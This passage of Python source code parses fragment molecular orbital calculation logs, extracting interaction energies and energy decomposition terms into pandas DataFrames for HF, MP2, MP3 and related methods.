tgtdf_filter.append(adddf).sort_values('I')\n                    print(tgtdf_filter.head())\n\n                hfifie = 0\n                mp2corr = 0\n                prmp2corr = 0\n                hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n                mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n                prmp2corr = tgtdf_filter['PR-TYPE1'].values.tolist()\n                dist = tgtdf_filter['DIST'].values.tolist()\n\n                mp2total = []\n                prmp2total = []\n                for i in range(len(hfifie)):\n                    mp2total.append(hfifie[i] + mp2corr[i])\n                    prmp2total.append(hfifie[i] + prmp2corr[i])\n\n                hfdf[str(f1)] = hfifie\n                mp2corrdf[str(f1)] = mp2corr\n                prmp2corrdf[str(f1)] = prmp2corr\n                mp2tdf[str(f1)] = mp2total\n                prmp2tdf[str(f1)] = prmp2total\n                distdf[str(f1)] = dist\n\n                if 'Solv(ES)' in tgtdf_filter.columns:\n                    solves = tgtdf_filter['Solv(ES)'].values.tolist()\n                    solvesdf[str(f1)] = solves\n\n                count += 1\n\n            print ('HF\n', hfdf.head())\n            print ('MP2corr\n', mp2corrdf.head())\n            print ('PRMP2corr\n', prmp2corrdf.head())\n            print ('MP2total\n', mp2tdf.head())\n            print ('PRMP2total\n', prmp2tdf.head())\n\n            self.hfdf = hfdf\n            self.mp2corrdf = mp2corrdf\n            self.prmp2corrdf = prmp2corrdf\n            self.mp2tdf = mp2tdf\n            self.prmp2tdf = prmp2tdf\n            self.distdf = distdf\n\n            if 'Solv(ES)' in 
tgtdf_filter.columns:\n solves = tgtdf_filter['Solv(ES)'].values.tolist()\n solvesdf[str(f1)] = solves\n\n count += 1\n\n print ('HF\\n', hfdf.head())\n\n self.hfdf = hfdf\n self.distdf = distdf\n\n if 'Solv(ES)' in tgtdf_filter.columns:\n self.solvesdf = solvesdf\n\n elif self.logMethod == 'MP3':\n mp2corrdf = pd.DataFrame(index=self.tgt2frag)\n mp3corrdf = pd.DataFrame(index=self.tgt2frag)\n mp25corrdf = pd.DataFrame(index=self.tgt2frag)\n usermp3corrdf = pd.DataFrame(index=self.tgt2frag)\n mp2tdf = pd.DataFrame(index=self.tgt2frag)\n mp3tdf = pd.DataFrame(index=self.tgt2frag)\n mp25tdf = pd.DataFrame(index=self.tgt2frag)\n usermp3tdf = pd.DataFrame(index=self.tgt2frag)\n\n for f1 in self.tgt1frag:\n fragids = []\n tgtdf = df[(df['I'] == f1) | (df['J'] == f1)]\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n print(tgtdf_filter)\n hfifie = 0\n mp2corr = 0\n mp3corr = 0\n usermp3corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n mp3corr = tgtdf_filter['MP3-IFIE'].values.tolist()\n usermp3corr = tgtdf_filter['USER-MP3'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n mp2total = []\n mp3total = []\n usermp3total = []\n mp25corr = []\n mp25total = []\n for i in range(len(hfifie)):\n mp2total.append(hfifie[i] + mp2corr[i])\n mp3total.append(hfifie[i] + mp3corr[i])\n usermp3total.append(hfifie[i] + usermp3corr[i])\n mp25total.append(hfifie[i] + (mp2corr[i] + mp3corr[i])*0.5)\n mp25corr.append((mp2corr[i] + mp3corr[i])*0.5)\n\n # print('hfifie', hfifie)\n # print('tgtfrag', self.tgt2frag)\n\n hfdf[str(f1)] = hfifie\n mp2corrdf[str(f1)] = mp2corr\n mp3corrdf[str(f1)] = mp3corr\n mp25corrdf[str(f1)] = mp25corr\n usermp3corrdf[str(f1)] = usermp3corr\n mp2tdf[str(f1)] = mp2total\n mp3tdf[str(f1)] = mp3total\n mp25tdf[str(f1)] = mp25total\n usermp3tdf[str(f1)] = usermp3total\n distdf[str(f1)] = dist\n\n\n count += 1\n\n print ('HF\\n', hfdf.head())\n print ('MP3corr\\n', mp3corrdf.head())\n print ('USER-MP3corr\\n', usermp3corrdf.head())\n print ('MP3total\\n', mp3tdf.head())\n print ('USER-MP3total\\n', usermp3tdf.head())\n\n self.hfdf = hfdf\n self.mp2corrdf = mp2corrdf\n self.mp3corrdf = mp3corrdf\n self.mp25corrdf = mp25corrdf\n self.usermp3corrdf = usermp3corrdf\n self.mp2tdf = mp2tdf\n self.mp3tdf = mp3tdf\n self.mp25tdf = mp25tdf\n self.usermp3tdf = usermp3tdf\n self.distdf = distdf\n\n elif self.logMethod == 'CCPT':\n mp2corrdf = pd.DataFrame(index=self.tgt2frag)\n mp3corrdf = pd.DataFrame(index=self.tgt2frag)\n mp4corrdf = pd.DataFrame(index=self.tgt2frag)\n mp25corrdf = pd.DataFrame(index=self.tgt2frag)\n mp35corrdf = pd.DataFrame(index=self.tgt2frag)\n mp2tdf = pd.DataFrame(index=self.tgt2frag)\n mp3tdf = pd.DataFrame(index=self.tgt2frag)\n mp4tdf = pd.DataFrame(index=self.tgt2frag)\n mp25tdf = pd.DataFrame(index=self.tgt2frag)\n mp35tdf = pd.DataFrame(index=self.tgt2frag)\n\n for f1 in self.tgt1frag:\n fragids = []\n tgtdf = df[(df['I'] == f1) | (df['J'] == f1)]\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n hfifie = 0\n mp3corr = 0\n usermp3corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n mp3corr = tgtdf_filter['MP3-IFIE'].values.tolist()\n mp4corr = tgtdf_filter['MP4-IFIE'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n\n mp2total = []\n mp3total = []\n mp4total = []\n mp25corr = []\n mp35corr = []\n mp25total = []\n mp35total = 
[]\n for i in range(len(hfifie)):\n mp2total.append(hfifie[i] + mp2corr[i])\n mp3total.append(hfifie[i] + mp3corr[i])\n mp4total.append(hfifie[i] + mp4corr[i])\n mp25corr.append((mp2corr[i] + mp3corr[i])*0.5)\n mp35corr.append((mp2corr[i] + mp4corr[i])*0.5)\n mp25total.append(hfifie[i] + (mp2corr[i] + mp3corr[i])*0.5)\n mp35total.append(hfifie[i] + (mp2corr[i] + mp4corr[i])*0.5)\n\n # print('hfifie', hfifie)\n # print('tgtfrag', self.tgt2frag)\n\n hfdf[str(f1)] = hfifie\n mp2corrdf[str(f1)] = mp2corr\n mp3corrdf[str(f1)] = mp3corr\n mp4corrdf[str(f1)] = mp4corr\n mp25corrdf[str(f1)] = mp25corr\n mp35corrdf[str(f1)] = mp35corr\n mp2tdf[str(f1)] = mp2total\n mp3tdf[str(f1)] = mp3total\n mp4tdf[str(f1)] = mp4total\n mp25tdf[str(f1)] = mp25total\n mp35tdf[str(f1)] = mp35total\n distdf[str(f1)] = dist\n\n count += 1\n\n# print ('HF\\n', hfdf.head())\n# print ('MP3corr\\n', mp3corrdf.head())\n# print ('USER-MP3corr\\n', usermp3corrdf.head())\n# print ('MP3total\\n', mp3tdf.head())\n# print ('USER-MP3total\\n', usermp3tdf.head())\n\n self.hfdf = hfdf\n self.mp2corrdf = mp2corrdf\n self.mp3corrdf = mp3corrdf\n self.mp4corrdf = mp4corrdf\n self.mp25corrdf = mp25corrdf\n self.mp35corrdf = mp35corrdf\n self.mp2tdf = mp2tdf\n self.mp3tdf = mp3tdf\n self.mp4tdf = mp4tdf\n self.mp25tdf = mp25tdf\n self.mp35tdf = mp35tdf\n self.distdf = distdf\n\n return\n\n def depth(self, k):\n if not k:\n return 0\n else:\n if isinstance(k, list):\n return 1 + max(self.depth(i) for i in k)\n else:\n return 0\n\n def gettgtdf_n2tfmatrix(self, i, df, f1):\n # gettgtdf_normal to times-frags\n if self.depth(self.tgt2frag) >= 2:\n tgt2frag = self.tgt2frag[i]\n else:\n tgt2frag = self.tgt2frag\n\n hfdf = pd.DataFrame(index=tgt2frag)\n mp2corrdf = pd.DataFrame(index=tgt2frag)\n prmp2corrdf = pd.DataFrame(index=tgt2frag)\n mp2tdf = pd.DataFrame(index=tgt2frag)\n prmp2tdf = pd.DataFrame(index=tgt2frag)\n distdf = pd.DataFrame(index=tgt2frag)\n\n fragids = []\n tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n tgtdf2 = df[(df['J'] == f1)]\n tgtdf = tgtdf1.append(tgtdf2)\n\n tgtfrags = copy.deepcopy(tgt2frag)\n try:\n tgtfrags.remove(f1)\n except:\n pass\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n\n if f1 in tgt2frag:\n # print ([i for i in range(len(tgtdf_filter.columns))])\n adddf = pd.DataFrame([f1, f1]+ [0 for j in range(len(tgtdf_filter.columns)-2)], index=tgtdf_filter.columns).T\n tgtdf_filter = tgtdf_filter.append(adddf).sort_values('I')\n # print(tgtdf_filter.head())\n\n hfifie = 0\n mp2corr = 0\n prmp2corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n prmp2corr = tgtdf_filter['PR-TYPE1'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n mp2total = []\n prmp2total = []\n for j in range(len(hfifie)):\n mp2total.append(hfifie[j] + mp2corr[j])\n prmp2total.append(hfifie[j] + prmp2corr[j])\n\n # print('hfifie', len(hfifie))\n # print('hfifie', hfifie)\n hfdf[self.tgttimes[i]] = hfifie\n mp2corrdf[self.tgttimes[i]] = mp2corr\n prmp2corrdf[self.tgttimes[i]] = prmp2corr\n mp2tdf[self.tgttimes[i]] = mp2total\n prmp2tdf[self.tgttimes[i]] = prmp2total\n distdf[self.tgttimes[i]] = dist\n\n\n # print (hfdf.head())\n # print (mp2corrdf.head())\n # print (prmp2corrdf.head())\n # print (mp2tdf.head())\n # print (prmp2tdf.head())\n #print(distdf.head())\n\n return hfdf, mp2corrdf, prmp2corrdf, mp2tdf, prmp2tdf, distdf\n\n\n def gettgtpidf_n2tfmatrix(self, i, df, hfdf, f1):\n # define tgtfrag for 
molname - frags\n if self.depth(self.tgt2frag) >= 2:\n tgt2frag = self.tgt2frag[i]\n else:\n tgt2frag = self.tgt2frag\n\n esdf = pd.DataFrame(index=tgt2frag)\n exdf = pd.DataFrame(index=tgt2frag)\n ctdf = pd.DataFrame(index=tgt2frag)\n didf = pd.DataFrame(index=tgt2frag)\n\n tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n tgtdf2 = df[(df['J'] == f1)]\n tgtdf = tgtdf1.append(tgtdf2)\n # print(tgtdf)\n\n tgtfrags = copy.deepcopy(tgt2frag)\n try:\n tgtfrags.remove(f1)\n except:\n pass\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n fragis = tgtdf_filter['I'].values.tolist()\n fragjs = tgtdf_filter['J'].values.tolist()\n\n # pickup wodimesapr_id from I and J\n wodimesapr_id = []\n for j in range(len(fragis)):\n if fragis[j] != f1:\n wodimesapr_id.append(fragis[j])\n else:\n wodimesapr_id.append(fragjs[j])\n # print(wodimesapr_id)\n\n hfifie = 0\n mp2corr = 0\n prmp2corr = 0\n\n esbuf = tgtdf_filter['ES'].values.tolist()\n exbuf = tgtdf_filter['EX'].values.tolist()\n ctbuf = tgtdf_filter['CT-mix'].values.tolist()\n dibuf = tgtdf_filter['DI(MP2)'].values.tolist()\n\n\n # complement values from ifdf\n es = []\n ex = []\n ct = []\n di = []\n\n for j in range(len(tgt2frag)):\n tgtid = tgt2frag[j]\n# if tgtid == f1:\n# continue\n if tgtid in wodimesapr_id:\n es.append(esbuf[wodimesapr_id.index(tgtid)])\n ex.append(exbuf[wodimesapr_id.index(tgtid)])\n ct.append(ctbuf[wodimesapr_id.index(tgtid)])\n di.append(dibuf[wodimesapr_id.index(tgtid)])\n else:\n es.append(hfdf.loc[tgtid, str(self.tgttimes[i])])\n ex.append(0.0)\n ct.append(0.0)\n di.append(0.0)\n\n esdf[self.tgttimes[i]] = es\n exdf[self.tgttimes[i]] = ex\n ctdf[self.tgttimes[i]] = ct\n didf[self.tgttimes[i]] = di\n\n# print (esdf.head())\n# print (exdf.head())\n# print (ctdf.head())\n\n # print('esdf\\n', esdf)\n return esdf, exdf, didf, ctdf\n\n # return hfdf, mp2corrdf, prmp2corrdf, mp2tdf, prmp2tdf\n\n def gettgtdf_fd(self, df):\n\n # filter tgt1frag IFIE\n tgtdf = df[(df['I'] == self.tgt1frag[0]) | (df['J'] == self.tgt1frag[0])]\n if self.tgt2type == 'dist':\n print('--- ifie around tgt ', self.tgt1frag, self.dist, 'angstrom ---')\n tgtdf_filter = tgtdf[tgtdf['DIST'] < self.dist]\n elif self.tgt2type == 'dimer-es':\n print('--- ifie around tgt ', self.tgt1frag, 'without Dimer-es approximation ---')\n if self.f90soflag == True:\n tgtdf_filter = tgtdf[tgtdf['DIMER-ES'] == 0]\n else:\n tgtdf_filter = tgtdf[tgtdf['DIMER-ES'] == 'F']\n\n return tgtdf, tgtdf_filter\n\n def gettgtdf_ff(self, df, frag1, frag2):\n # print('--- ifie frag ', frag1, frag2, '----')\n frag1 = int(frag1)\n frag2 = int(frag2)\n tgtdf_filter = df[((df['I'] == frag1) & (df['J'] == frag2)) | ((df['I'] == frag2) & (df['J'] == frag1))]\n # tgtdf_filter = df[((df['I'] == frag1) & (df['J'] == frag2)) | ((df['I'] == frag2) & (df['J'] == frag1))]\n return tgtdf_filter\n\n\n def gettgtdf_ffs(self, df, frag1, frag2):\n # print('--- ifie frag ', frag1, frag2, '----')\n print(frag1, frag2)\n tgtdf_filter = df[((df['I'] == frag1) & (df['J'].isin(frag2))) | ((df['I'].isin(frag2)) & (df['J'] == frag1))]\n # tgtdf_filter = df[((df['I'] == frag1) & (df['J'] == frag2)) | ((df['I'] == frag2) & (df['J'] == frag1))]\n return tgtdf_filter\n\n\n def getifiesummol(self, df, molfrags, molid):\n tgtdf_filters = pd.DataFrame(columns=self.icolumn)\n print(self.dist)\n tgtdf = df[df['I'].isin(molfrags) | df['J'].isin(molfrags)]\n tgtdf_filters = tgtdf[tgtdf['DIST'] < self.dist]\n\n print(tgtdf_filters.head())\n\n # get I column value\n neighbor_i 
= [index for index, row in tgtdf_filters.groupby(\"I\")]\n print(neighbor_i)\n # get J coulum value\n neighbor_j = [index for index, row in tgtdf_filters.groupby(\"J\")]\n neighbors= list(set(neighbor_i + neighbor_j))\n neighbors.sort()\n alreadys = copy.deepcopy(molfrags)\n contactmolfrags = []\n for i in neighbors:\n if i in alreadys:\n continue\n molfrag_new = self.getmolfrags(i, df)\n contactmolfrags.append(molfrag_new)\n alreadys = alreadys + molfrag_new\n # print(alreadys)\n print('contactmolfrags\\n', contactmolfrags)\n\n # print('-- ifie frag_mol --')\n '''\n ifie_frag_mol: df frag-frag in each mol\n ifiesums: mol-mol ifie for each mol\n '''\n\n ifdf_frag_mols = []\n for contactmolfrag in contactmolfrags:\n ifie_frag_mol = df[(df['I'].isin(contactmolfrag) & df['J'].isin(molfrags)) | (df['J'].isin(contactmolfrag) & df['I'].isin(molfrags))]\n ifdf_frag_mols.append(ifie_frag_mol)\n\n #pieda\n for i in range(len(ifdf_frag_mols)):\n ifdf_frag_mols[i] = pd.merge(ifdf_frag_mols[i], self.pidf, on=['I', 'J'], how='left')\n print(ifdf_frag_mols[0])\n\n\n count = 0\n if self.abinit_ver == 'rev17' or self.abinit_ver == 'rev16':\n self.ifdfsumcolumn = [['HF-IFIE', 'MP2-IFIE', 'ES', 'EX', 'Solv(ES)', 'CT-mix', 'DI(MP2)', 'q(I=>J)']]\n\n HF_IFIE_sums = []\n MP2_IFIE_sums = []\n PR_TYPE1_sums = []\n GRIMME_sums = []\n JUNG_sums = []\n HILL_sums = []\n ES_sums = []\n EX_sums = []\n CT_sums = []\n DI_sums = []\n q_sums = []\n\n for datadf in ifdf_frag_mols:\n HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum = self.getsumdf(datadf)\n HF_IFIE_sums.append(HF_IFIE_sum)\n MP2_IFIE_sums.append(MP2_IFIE_sum)\n PR_TYPE1_sums.append(PR_TYPE1_sum)\n GRIMME_sums.append(GRIMME_sum)\n JUNG_sums.append(JUNG_sum)\n HILL_sums.append(HILL_sum)\n ES_sums.append(ES_sum)\n EX_sums.append(EX_sum)\n CT_sums.append(CT_sum)\n DI_sums.append(DI_sum)\n q_sums.append(q_sum)\n\n ifdf_mol_mol = pd.DataFrame(columns=self.ifdfsumcolumn)\n # self.ifdfsumcolumn = ['HF-IFIE', 'MP2-IFIE', 'PR-TYPE1', 'GRIMME', 'JUNG', 'HILL', 'ES', 'EX', 'CT-mix', 'DI(MP2)', 'q(I=>J)']\n\n ifdf_mol_mol['I'] = contactmolfrags\n ifdf_mol_mol['J'] = [molfrags for i in range(len(HF_IFIE_sums))]\n ifdf_mol_mol['HF-IFIE'] = HF_IFIE_sums\n ifdf_mol_mol['MP2-IFIE'] = MP2_IFIE_sums\n ifdf_mol_mol['PR_TYPE1'] = PR_TYPE1_sums\n ifdf_mol_mol['GRIMME'] = GRIMME_sums\n ifdf_mol_mol['JUNG'] = JUNG_sums\n ifdf_mol_mol['HILL'] = HILL_sums\n ifdf_mol_mol['ES'] = ES_sums\n ifdf_mol_mol['EX'] = EX_sums\n ifdf_mol_mol['CT-mix'] = CT_sums\n ifdf_mol_mol['DI(MP2)'] = DI_sums\n ifdf_mol_mol['q(I=>J)'] = q_sums\n\n\n HF_IFIE_molsum = sum(HF_IFIE_sums)\n MP2_IFIE_molsum = sum(MP2_IFIE_sums)\n PR_TYPE1_molsum = sum(PR_TYPE1_sums)\n GRIMME_molsum = sum(GRIMME_sums)\n JUNG_molsum = sum(JUNG_sums)\n HILL_molsum = sum(HILL_sums)\n ES_molsum = sum(ES_sums)\n EX_molsum = sum(EX_sums)\n CT_molsum = sum(CT_sums)\n DI_molsum = sum(DI_sums)\n q_molsum = sum(q_sums)\n\n ifdf_molsum = pd.Series([HF_IFIE_molsum, MP2_IFIE_molsum, PR_TYPE1_molsum, GRIMME_molsum, JUNG_molsum, HILL_molsum, ES_molsum, EX_molsum, CT_molsum, DI_molsum, q_molsum], index=self.ifdfsumcolumn, name='mol'+str(molid))\n\n return contactmolfrags, ifdf_frag_mols, ifdf_mol_mol, ifdf_molsum\n\n def getsumdf(self, df):\n HF_IFIE_sum = df['HF-IFIE'].sum()\n MP2_IFIE_sum = df['MP2-IFIE'].sum()\n PR_TYPE1_sum = df['PR-TYPE1'].sum()\n GRIMME_sum = df['GRIMME'].sum()\n JUNG_sum = df['JUNG'].sum()\n HILL_sum = df['HILL'].sum()\n\n ES_sum = df['ES'].sum()\n EX_sum = 
df['EX'].sum()\n CT_sum = df['CT-mix'].sum()\n DI_sum = df['DI(MP2)'].sum()\n q_sum = df['q(I=>J)'].sum()\n\n return HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum\n\n\n def getpitgtdf(self, pidf, ifdf_filter):\n print('--- pieda near tgt ', self.dist, 'angstrom ----')\n # print('--- pieda for tgt frag ----')\n tgt1frag = self.tgt1frag[0]\n tgtdf_filter = pidf[(pidf['I'] == tgt1frag) |(pidf['J'] == tgt1frag)]\n\n# fragids = []\n# tgtdf = df[(df['I'] == self.tgt1frag) | (df['J'] == self.tgt1frag)]\n# tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n fragids = []\n fragis = tgtdf_filter['I'].values.tolist()\n fragjs = tgtdf_filter['J'].values.tolist()\n for i in range(len(fragis)):\n if fragis[i] != tgt1frag:\n fragids.append(fragis[i])\n else:\n fragids.append(fragjs[i])\n print('inside Dimter-ES region', fragids)\n\n allids = []\n allis = ifdf_filter['I'].values.tolist()\n alljs = ifdf_filter['J'].values.tolist()\n\n for i in range(len(allis)):\n if allis[i] != tgt1frag:\n allids.append(allis[i])\n else:\n allids.append(alljs[i])\n # print('all pair', allids)\n\n # complement values from ifdf\n\n df = ifdf_filter\n pitgtdf_filters = pd.DataFrame(columns=self.pcolumn)\n count = 0\n for i in range(len(allids)):\n pitgtdf_filter = self.gettgtdf_ff(tgtdf_filter, tgt1frag, allids[i])\n if len(pitgtdf_filter) == 0:\n esdata = df[(df['I'] == allids[i]) |(df['J'] == allids[i])]['HF-IFIE'].values.tolist()[0]\n pitgtdf_filters.loc[str(count)] = [int(tgt1frag), int(allids[i]), esdata, 0.0, 0.0, 0.0, 0.0]\n else:\n pitgtdf_filters = pitgtdf_filters.append(pitgtdf_filter)\n count +=1\n\n # print(pitgtdf_filters.head())\n\n return pitgtdf_filters\n\n\n def read_ifiepieda(self, fname):\n ''' read ifie and pieda data from file\n\n read ifie and pieda data from file\n\n Args:\n fname (str): file name\n\n Returns:\n ifie (list): ifie data\n pieda (list): pieda data\n '''\n # print('start getifiepieda')\n ifie = []\n count = 0\n pieda = []\n pcount = 0\n momcount = 0\n dimcount = 0\n momene = []\n dimene = []\n pflag = False\n bsseflag = False\n bssecount = 0\n bsse = []\n\n if not os.path.exists(fname):\n print(\"can't open\", fname)\n return ifie, pieda, momene, dimene\n\n file = open(fname, \"rt\")\n\n flag = False\n momflag = False\n dimflag = False\n # print text\n for i in range(len(text)):\n # itemList = text[i][:-1].split()\n itemList = file.readline().strip().split()\n\n # print itemList\n if len(itemList) < 2:\n continue\n if itemList[1:3] == ['MONOMER', 'ENERGY']:\n momflag = True\n continue\n if itemList[1:3] == ['DIMER', 'ENERGY']:\n dimflag = True\n continue\n if itemList[1:3] == ['DIMER', '']:\n dimflag = False\n if dimflag is True:\n dimcount += 1\n if dimflag is True and dimcount > 2:\n # print('DIMER Energy', itemList)\n dimene.append(itemList)\n\n if momflag:\n # print(itemList)\n momcount += 1\n if momcount == 1 + int(self.tgt1frag[0]):\n momene.append(itemList)\n momflag = False\n\n if itemList[1] == 'MP2-IFIE' or itemList[1] == 'HF-IFIE':\n flag = True\n # head.append(itemList)\n continue\n if itemList[1] == 'PIEDA':\n flag = False\n pflag = True\n # print('pieda start!!')\n continue\n if flag is True:\n count += 1\n if flag is True and count > 2:\n if self.logMethod == 'HF':\n ifie.append(itemList[:-2])\n else:\n ifie.append(itemList)\n if len(itemList) < 2:\n continue\n\n # after pieda or BSSE (break)\n if itemList[1] == 'Mulliken':\n # flag = False\n break\n # for BSSE\n if 
pflag is True and itemList[:5] == ['##','BSSE', 'for','non-bonding','MP2-IFIE']:\n pflag = False\n # print('pieda end! next is BSSE')\n continue\n if itemList[:4] == ['##','BSSE', 'for', 'MP2-IFIE']:\n bsseflag = True\n # print('BSSE start!')\n continue\n if bsseflag is True:\n bssecount += 1\n if bsseflag is True and bssecount > 2:\n bsse.append(itemList)\n\n # for pieda\n if pflag is True:\n pcount += 1\n if pflag is True and pcount > 2:\n pieda.append(itemList)\n\n if not flag and not pflag and not bsseflag:\n print(\"can't read ifie\", fname.split(\"/\")[-1])\n return [], [], [], []\n\n for i in range(len(ifie)):\n if float(ifie[i][4]) < -2:\n ifie[i][4] = 0.0\n if self.logMethod != 'HF':\n ifie[i][5] = 0.0\n ifie[i][6] = 0.0\n\n print('bsse', bsse[0])\n\n file.close()\n return ifie, pieda, momene, dimene, bsse\n # print ifie\n\n def read_pbifiepieda(self, fname):\n ifie = []\n count = 0\n pieda = []\n pcount = 0\n pflag = False\n sflag = False\n\n try:\n f = open(fname, \"r\")\n text = f.readlines()\n f.close()\n except:\n print(\"can't open\", fname)\n return ifie\n flag = False\n # print text\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print itemList\n if len(itemList) < 2:\n continue\n if itemList[1] == 'MP2-IFIE' or itemList[1] == 'HF-IFIE':\n flag = True\n ifie = []\n pieda = []\n # head.append(itemList)\n continue\n if itemList[1] == 'PIEDA':\n flag = False\n pflag = True\n continue\n if flag is True:\n count += 1\n if flag is True and count > 2:\n if self.logMethod == 'HF':\n ifie.append(itemList[:-2])\n else:\n ifie.append(itemList)\n # print itemList\n if len(itemList) < 2:\n continue\n\n if itemList[1] == 'PIEDA':\n pflag = True\n # head.append(itemList)\n continue\n if itemList[1] == 'Mulliken':\n flag = False\n pflag = False\n count = 0\n pcount = 0\n continue\n if pflag is True:\n pcount += 1\n if pflag is True and pcount > 2:\n pieda.append(itemList)\n\n if itemList[1] == 'SOLVENT-SCREENING':\n sflag = True\n solv = []\n scount = 0\n if sflag == True:\n scount += 1\n\n if itemList[1:3] == ['NONPOLAR', 'CONTRIBUTION']:\n sflag = False\n break\n\n if sflag is True and scount > 5:\n solv.append([itemList[1], itemList[2], itemList[12]])\n\n if not flag and not pflag:\n try:\n print(\"can't read ifie\", fname.split(\"/\")[1])\n except:\n pass\n\n for i in range(len(ifie)):\n # print(ifie[i][4])\n if float(ifie[i][4]) < -2:\n ifie[i][4] = 0.0\n if self.logMethod != 'HF':\n ifie[i][5] = 0.0\n ifie[i][6] = 0.0\n\n return ifie, pieda, solv\n\n\n def read_ifiepiedas(self, tgtlog):\n '''read ifie and pieda from log file\n Args:\n tgtlog (str): log file name\n Returns:\n ifdfs (list): ifie dataframe\n pidfs (list): pieda dataframe\n momenedf (list): momene dataframe\n dimenedf (list): dimene dataframe\n bssedfs (list): bsse dataframe\n '''\n # tgtlog, tgttime = args\n print('read', tgtlog)\n\n # getifie\n # HF or MP2 is supported on py function\n ifie, pieda, momene, dimene, bsse = self.read_ifiepieda(tgtlog)\n # print('l1613', 'ifie', ifie[0], 'pieda', pieda[0], 'mom', momene)\n\n # get dataframe list\n ifdfs = self.getifiedf(ifie)\n pidfs = self.getpiedadf(pieda)\n\n self.is_bsse = True\n if self.is_bsse:\n bssedfs = self.getbssedf(bsse)\n else:\n bssedfs = []\n if self.is_momdimene:\n momenedf = self.getmomenedf(momene)\n dimenedf = self.getdimenedf(dimene)\n else:\n momenedf = []\n dimenedf = []\n # print('ifdfs', ifdfs)\n # print('pidfs', pidfs)\n\n return [ifdfs, pidfs, momenedf, dimenedf, bssedfs]\n\n\n def getfiltifpiff(self, i, ifdf, pidf):\n '''get 
filtered ifie and pieda dataframe\n\n Args:\n i (int): index of rec\n ifdf (dataframe): ifie dataframe\n pidf (dataframe): pieda dataframe\n Returns:\n ifdf_filter (dataframe): filtered ifie dataframe\n pidf_filter (dataframe): filtered pieda dataframe\n '''\n\n # in (class var: molnames(rec i), tgt2frag, tgt1frag, tgttimes, matrixtype\n # local var:i, ifdf, pidf\n # out tgtdf_filter, pitgtdf_filter\n\n # ifie\n ifdf_filter = pd.DataFrame()\n ifdf_filter = self.gettgtdf_ff(ifdf, self.tgt1frag[0], self.tgt2frag[0])\n # print(ifdf_filter)\n ifdf_filter = pd.merge(ifdf_filter, pidf, on=['I', 'J'], how='left')\n ifdf_filter = ifdf_filter.rename(index={ifdf_filter.index[0]:self.tgttimes[i]})\n\n # pieda\n# pitgtdf_filter = self.gettgtdf_ff(pidf, self.tgt1frag[0], self.tgt2frag[0])\n# if len(pitgtdf_filter) == 0:\n# esdata = ifdf_filter['HF-IFIE'][0]\n# tmpps = pd.Series([self.tgt1frag[0], self.tgt2frag[0], esdata, 0.0, 0.0, 0.0, 0.0], index=self.pcolumn, name =self.tgttimes[i])\n# pitgtdf_filter = pitgtdf_filter.append(tmpps)\n# else:\n# pitgtdf_filter = pitgtdf_filter.rename(index={pitgtdf_filter.index[0]:self.tgttimes[i]})\n#\n# # print(pitgtdf_filter)\n\n return ifdf_filter\n\n\n def getfiltifpifm(self, i, ifdf, pidf):\n '''get filtered ifie and pieda dataframe\n\n Args:\n i (int): index of rec\n ifdf (dataframe): ifie dataframe\n pidf (dataframe): pieda dataframe\n\n Returns:\n ifdf_filter (dataframe): filtered ifie dataframe\n pidf_filter (dataframe): filtered pieda dataframe\n '''\n\n # in (class var: log(rec i), nf(rec i), molnames(rec i), tgt2molname, tgt1frag,\n # local var: ifdf, pidf\n # out tgtdf_filter, tgtifdfsum\n # pitgtdf_filter, pitgtdfsum\n\n print('### read frag info ###')\n\n # molfragss\n molfragss = self.getallmolfrags(self.tgtlogs[i], ifdf, self.nfs[i])\n # molfragss fragment ids per mol (fragment connect is judged by checking frag-frag distance)\n print('molfragss', molfragss)\n print('len molfragss', len(molfragss))\n\n # get tgt frag id\n # IFIE\n molnames_inrec = self.molnames_perrec[i]\n rname_perfraginrec = self.resnamenonums_perfrag[i]\n\n tgtmolfrags = []\n # print('molnames', molnames_inrec)\n # print('len molnames', len(molnames_inrec))\n\n print('molnames_perfrag', rname_perfraginrec)\n print('len molnames_perfrag', len(rname_perfraginrec))\n\n rname_permolinrec = copy.deepcopy(molfragss)\n for j in range(len(rname_permolinrec)):\n # if type(molfragss[j]) == list:\n for k in range(len(molfragss[j])):\n num = copy.deepcopy(molfragss[j][k]) - 1\n rname_permolinrec[j][k] = rname_perfraginrec[num]\n\n for j in range(len(rname_permolinrec)):\n try:\n if self.tgt2molname in rname_permolinrec[j]:\n tgtmolfrags += molfragss[j]\n except:\n continue\n print(tgtmolfrags)\n\n frag1 = self.tgt1frag\n if type(frag1) == int:\n frag1s = [frag1]\n print('tgtfrag1s', frag1s)\n else:\n frag1s = copy.deepcopy(frag1)\n\n self.frag1s = frag1s\n ifdf_filter = pd.DataFrame()\n ifdf_filters = []\n ifdfsums = []\n for frag1p in frag1s:\n ifdf_filter = self.gettgtdf_ffs(ifdf, frag1p, 